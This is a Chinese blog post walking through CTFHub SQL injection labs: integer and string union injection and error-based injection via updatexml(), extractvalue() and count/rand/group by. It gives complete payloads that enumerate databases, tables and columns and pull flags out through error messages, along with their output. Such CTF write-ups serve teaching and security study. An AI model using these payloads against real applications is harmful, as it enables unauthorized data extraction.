Ctfhub之SQL注入|SQL报错注入及原理详解

2024-03-23 17:18

本文主要是介绍Ctfhub之SQL注入|SQL报错注入及原理详解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

SQL报错注入及原理

  • 1、SQL 整数型注入
    • 1.1 查数据库名
    • 1.2 查数据表
    • 1.3 查flag表字段
  • 2、字符型注入
  • 3、报错注入
    • 3.1 updatexml() 函数报错注入原理
      • 3.1.1 updatexml() 函数定义
      • 3.1.2 updatexml() 函数运行机制
      • 3.1.3 updatexml() 函数运行示例
      • 3.1.4 利用updatexml()测试ctfhub的显错注入
    • 3.2 extractvalue()函数报错注入原理
      • 3.2.1 extractvalue()函数定义
      • 3.2.2 extractvalue()函数运行机制
      • 3.2.3 extractvalue() 函数运行示例
      • 3.2.4 利用extractvalue()函数测试ctfhub的显错注入
    • 3.3 (count()、rand()、group by)联合报错注入原理
      • 3.3.1 (count()、rand()、group by) 联合报错注入运行机制
      • 3.3.2 (count()、rand()、group by) 函数运行示例
      • 3.3.3 利用 (count()、rand()、group by)测试ctfhub的显错注入
    • 3.4 其他报错注入函数

1、SQL 整数型注入

1.1 查数据库名

-1 union select group_concat(schema_name),2 from information_schema.schemata -- +

结果:
information_schema,performance_schema,mysql,sqli

1.2 查数据表

-1 union select group_concat(table_name),2 from information_schema.tables where table_schema=database() -- +

结果:news,flag

1.3 查flag表字段

-1 union select group_concat(column_name),2 from information_schema.columns where table_name='flag' -- + 

结果:flag

查flag字段的值:
-1 union select flag,2 from flag -- +

结果:
ctfhub{70d1ad7bf9945bf0fd7d03a24b478ee02d8ed3fd}

2、字符型注入

与上题同理
此处直接查询flag字段的值

-1' union select flag,2 from flag -- +

结果:
ctfhub{b3539d51931d28bdba34214afe5da5d457938b44}

3、报错注入

报错注入使用的mysql函数XML Functions
XML Functions官方说明:传送门

名称描述
ExtractValue()使用XPath表示法从XML字符串中提取值
UpdateXML()返回替换的XML片段

注意:两个函数查询出的结果显示长度限制为32位

其他需要使用的函数left()、right()

名称描述用法
left()从左开始截取字符串left(str, length)==>left(被截取字符串, 截取长度)
right()从右开始截取字符串right(str, length)==>right(被截取字符串, 截取长度)

3.1 updatexml() 函数报错注入原理

3.1.1 updatexml() 函数定义

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
第三个参数:new_value,String格式,替换查找到的符合条件的数据;

3.1.2 updatexml() 函数运行机制

该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格式要求,则会报错并带出查询的结果

3.1.3 updatexml() 函数运行示例

正常查询替换
sql语句:

select updatexml('<a>c</a>','/a','<a>b</a>');

根据xpath语法规则,/、//、.、…、@都是合法的字符,要是函数报错需要使用以上字符之外的字符。

表达式描述
nodename选取此节点的所有子节点。
/从根节点选取。
//从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。
.选取当前节点。
选取当前节点的父节点。
@选取属性。

xpath语法参考:传送门
不报错示例
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
构造报错

select updatexml('<a>c</a>','~x~','<a>b</a>');

字符~对应ascii码的十六进制为0x7e
在这里插入图片描述
用字符#,构造报错,#对应ascii码的十六进制为0x23
在这里插入图片描述

3.1.4 利用updatexml()测试ctfhub的显错注入

查询flag:(左侧)

1 union select updatexml(1,concat(0x7e, left((select(concat(flag)) from sqli.flag) ,31),0x7e),1)

结果:
查询错误: XPATH syntax error: ‘~ctfhub{bfc44f267a22b32837b6b9bc’

查询flag:(右侧)

1 union select updatexml(1,concat(0x7e, right((select(concat(flag)) from sqli.flag) ,31),0x7e),1)

结果:
查询错误: XPATH syntax error: ‘~22b32837b6b9bcce6ad6d979e57e06}’

合并flag:
ctfhub{bfc44f267a22b32837b6b9bcce6ad6d979e57e06}

3.2 extractvalue()函数报错注入原理

3.2.1 extractvalue()函数定义

EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
作用:从目标XML中返回包含所查询值的字符串;

3.2.2 extractvalue()函数运行机制

与updatexml()函数相似,该函数对XPath_string进行查询操作,如果符合语法格式要求,则从目标XML中返回包含所查询值的字符串,不符合语法格式要求,则会报错并带出查询的结果

3.2.3 extractvalue() 函数运行示例

正常使用情形:

select extractvalue('<a>ccc<b>ddd</b></a>', '/a') ;

<a>ccc<b>ddd</b></a>中查找a结点下的字符串
在这里插入图片描述
<a>ccc<b>ddd</b></a>中查找a的子节点b下的字符串
在这里插入图片描述
构造报错情形:
因xpath语法不支持字符~,引起报错
在这里插入图片描述
使用xpath语法不支持的字符~,但是查询仍然执行,从报错结果中可查看查询结果
在这里插入图片描述

3.2.4 利用extractvalue()函数测试ctfhub的显错注入

查询flag:(左侧)

1 union select extractvalue(1,concat(0x7e,left((select flag from flag limit 0,1),31),0x7e))

结果:
查询错误: XPATH syntax error: ‘~ctfhub{037b6870a883f7e2591bf0e0’

查询flag:(右侧)

1 union select extractvalue(1,concat(0x7e,right((select flag from flag limit 0,1),31),0x7e))

结果:
查询错误: XPATH syntax error: ‘~83f7e2591bf0e0b24dd8c005e850ac}’

3.3 (count()、rand()、group by)联合报错注入原理

3.3.1 (count()、rand()、group by) 联合报错注入运行机制

mysql在遇到select count(*) from table group by floor(rand(0)*2)语句时,首先会建立一个虚拟表,其中floor(rand(0)*2)产生值为0和1的固定序列,使用group by的时候floor(rand(0)*2)会被执行多次,从而造成主键冲突引起报错
详细解释可参考《Mysql报错注入原理分析(count()、rand()、group by)》

3.3.2 (count()、rand()、group by) 函数运行示例

我这里用dvwa的数据库做示例

select count(*) from users group by concat(version(),0x7e,floor(rand(0)*2));在这里插入图片描述

3.3.3 利用 (count()、rand()、group by)测试ctfhub的显错注入

暴库名:

-1 union select count(*),id from news group by concat((select schema_name from information_schema.schemata limit 0,1),0x7e,floor(rand(0)*2));

查询错误: Duplicate entry ‘information_schema~1’ for key ‘group_key’

-1 union select count(*),id from news group by concat((select schema_name from information_schema.schemata limit 1,1),0x7e,floor(rand(0)*2)); 

查询错误: Duplicate entry ‘performance_schema~1’ for key ‘group_key’

查flag

-1 union select count(*),id from news group by concat((select flag from flag),0x7e,floor(rand(0)*2));

查询错误: Duplicate entry ‘ctfhub{8de883ddc01695e09f590bce0323e2956ceafda5}~1’ for key ‘group_key’

3.4 其他报错注入函数

这篇文章写的挺详细,欢迎参考《MySQL报错注入函数汇总》

其中
1、exp()函数在MySql5.5.5版本后整形溢出才会报错

2、几何函数报错注入geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring(),函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据,如果不满足要求,则会报错。
注意:以上函数需在低版本的mysql中才会报错

3、MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,所以5.1.5版本以下的MySQL不能用上述函数进行报错注入,上述报错注入函数有字符限制,最长32位

4、name_const(name,value)函数会用传入的参数返回一列结果集.传入的参数必须是常量,如果不是则报错,但在最新的MYSQL版本中,使用name_const()函数只能提取到数据库的版本信息。

这篇关于Ctfhub之SQL注入|SQL报错注入及原理详解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/839005

相关文章

Spring Security基于数据库验证流程详解

Spring Security 校验流程图 相关解释说明(认真看哦) AbstractAuthenticationProcessingFilter 抽象类 /*** 调用 #requiresAuthentication(HttpServletRequest, HttpServletResponse) 决定是否需要进行验证操作。* 如果需要验证,则会调用 #attemptAuthentica

SQL中的外键约束

外键约束用于表示两张表中的指标连接关系。外键约束的作用主要有以下三点: 1.确保子表中的某个字段(外键)只能引用父表中的有效记录2.主表中的列被删除时,子表中的关联列也会被删除3.主表中的列更新时,子表中的关联元素也会被更新 子表中的元素指向主表 以下是一个外键约束的实例展示

基于MySQL Binlog的Elasticsearch数据同步实践

一、为什么要做 随着马蜂窝的逐渐发展,我们的业务数据越来越多,单纯使用 MySQL 已经不能满足我们的数据查询需求,例如对于商品、订单等数据的多维度检索。 使用 Elasticsearch 存储业务数据可以很好的解决我们业务中的搜索需求。而数据进行异构存储后,随之而来的就是数据同步的问题。 二、现有方法及问题 对于数据同步,我们目前的解决方案是建立数据中间表。把需要检索的业务数据,统一放到一张M

如何去写一手好SQL

MySQL性能 最大数据量 抛开数据量和并发数,谈性能都是耍流氓。MySQL没有限制单表最大记录数,它取决于操作系统对文件大小的限制。 《阿里巴巴Java开发手册》提出单表行数超过500万行或者单表容量超过2GB,才推荐分库分表。性能由综合因素决定,抛开业务复杂度,影响程度依次是硬件配置、MySQL配置、数据表设计、索引优化。500万这个值仅供参考,并非铁律。 博主曾经操作过超过4亿行数据

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

深入探索协同过滤:从原理到推荐模块案例

文章目录 前言一、协同过滤1. 基于用户的协同过滤(UserCF)2. 基于物品的协同过滤(ItemCF)3. 相似度计算方法 二、相似度计算方法1. 欧氏距离2. 皮尔逊相关系数3. 杰卡德相似系数4. 余弦相似度 三、推荐模块案例1.基于文章的协同过滤推荐功能2.基于用户的协同过滤推荐功能 前言     在信息过载的时代,推荐系统成为连接用户与内容的桥梁。本文聚焦于

MySQL数据库宕机,启动不起来,教你一招搞定!

作者介绍:老苏,10余年DBA工作运维经验,擅长Oracle、MySQL、PG、Mongodb数据库运维(如安装迁移,性能优化、故障应急处理等)公众号:老苏畅谈运维欢迎关注本人公众号,更多精彩与您分享。 MySQL数据库宕机,数据页损坏问题,启动不起来,该如何排查和解决,本文将为你说明具体的排查过程。 查看MySQL error日志 查看 MySQL error日志,排查哪个表(表空间

OpenHarmony鸿蒙开发( Beta5.0)无感配网详解

1、简介 无感配网是指在设备联网过程中无需输入热点相关账号信息,即可快速实现设备配网,是一种兼顾高效性、可靠性和安全性的配网方式。 2、配网原理 2.1 通信原理 手机和智能设备之间的信息传递,利用特有的NAN协议实现。利用手机和智能设备之间的WiFi 感知订阅、发布能力,实现了数字管家应用和设备之间的发现。在完成设备间的认证和响应后,即可发送相关配网数据。同时还支持与常规Sof

hdu4407(容斥原理)

题意:给一串数字1,2,......n,两个操作:1、修改第k个数字,2、查询区间[l,r]中与n互质的数之和。 解题思路:咱一看,像线段树,但是如果用线段树做,那么每个区间一定要记录所有的素因子,这样会超内存。然后我就做不来了。后来看了题解,原来是用容斥原理来做的。还记得这道题目吗?求区间[1,r]中与p互质的数的个数,如果不会的话就先去做那题吧。现在这题是求区间[l,r]中与n互质的数的和

MySQL高性能优化规范

前言:      笔者最近上班途中突然想丰富下自己的数据库优化技能。于是在查阅了多篇文章后,总结出了这篇! 数据库命令规范 所有数据库对象名称必须使用小写字母并用下划线分割 所有数据库对象名称禁止使用mysql保留关键字(如果表名中包含关键字查询时,需要将其用单引号括起来) 数据库对象的命名要能做到见名识意,并且最后不要超过32个字符 临时库表必须以tmp_为前缀并以日期为后缀,备份